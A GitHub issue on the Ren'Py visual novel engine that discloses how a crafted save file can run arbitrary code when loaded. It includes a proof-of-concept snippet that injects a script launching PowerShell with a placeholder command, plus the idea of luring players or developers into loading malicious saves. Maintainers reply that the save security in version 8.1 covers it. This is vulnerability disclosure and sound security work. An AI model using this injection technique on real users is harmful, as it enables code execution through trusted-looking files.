Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vulnerability in save files #4879

Closed
malikiz opened this issue Jul 30, 2023 · 4 comments
Closed

Vulnerability in save files #4879

malikiz opened this issue Jul 30, 2023 · 4 comments
Labels
done? The issue or bug has likely already been adressed or solved.

Comments

@malikiz
Copy link

malikiz commented Jul 30, 2023

With the help of the features of the engine and how the game saves work, it is possible to introduce injections of malicious code.

How:
The engine has a renpy.run method that can execute any script from a string. Further in the game, you can rewrite any method in the game that is declared in the label, using the Function class, which is designed for actions in screens.

And what do we have:

init python:
    def inject():
        code_to_inject = ("""
init python:
    import subprocess
    import requests

   subprocess.Popen(["powershell", "-Command",
            'any command here'
        ],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        shell=True,
    )

    subprocess = None
""")

        actions = [
            Function(renpy.load_string, code_to_inject, "scripts/asd.rpy")
        ]

        any_object.custom_method = Function(renpy.run, actions)

Next, the inject() function is executed in the game console, then saving is done. The attacker can transfer this saving to the victim in order to harm the user. After that, this method will be called in the game, with one hundred percent probability it will be called if it is used in the after_load label. Players often ask someone on the Internet for a save file, especially if an update has been released in some game and the player has lost his saves. After that, an attacker can take advantage of this situation and send him a malicious save file. So far I don't have any good ideas on how this could be solved without complicating the life of game developers.
@Gouvernathor
Copy link
Member

That's why we have save security : the saves are flagged with the ID of the computer that generated it, so when you try to load a save that has a different flag than your computer, or that has no flag, you are asked to confirm if you are sure of the origin of the save file.

@Gouvernathor Gouvernathor added the done? The issue or bug has likely already been adressed or solved. label Jul 30, 2023
@renpytom
Copy link
Member

Correct, this is the point of the save security in 8.1. If people accept a save file from random people on the internet, that's the problem.

@malikiz
Copy link
Author

malikiz commented Jul 30, 2023

I also want to say why this is important. In addition to the victims of the players, a game developer can become a victim. The game developer may ask the player to send a save file to reproduce the bug that the player allegedly found. And the developer can fall for it and transfer his data to an attacker

@renpytom
Copy link
Member

renpytom commented Jul 31, 2023
edited

Game developers see the same messages players do. The changes in 8.1 are intended to make everyone aware that taking saves from people you don't trust is risky.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
done? The issue or bug has likely already been adressed or solved.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@renpytom @malikiz @Gouvernathor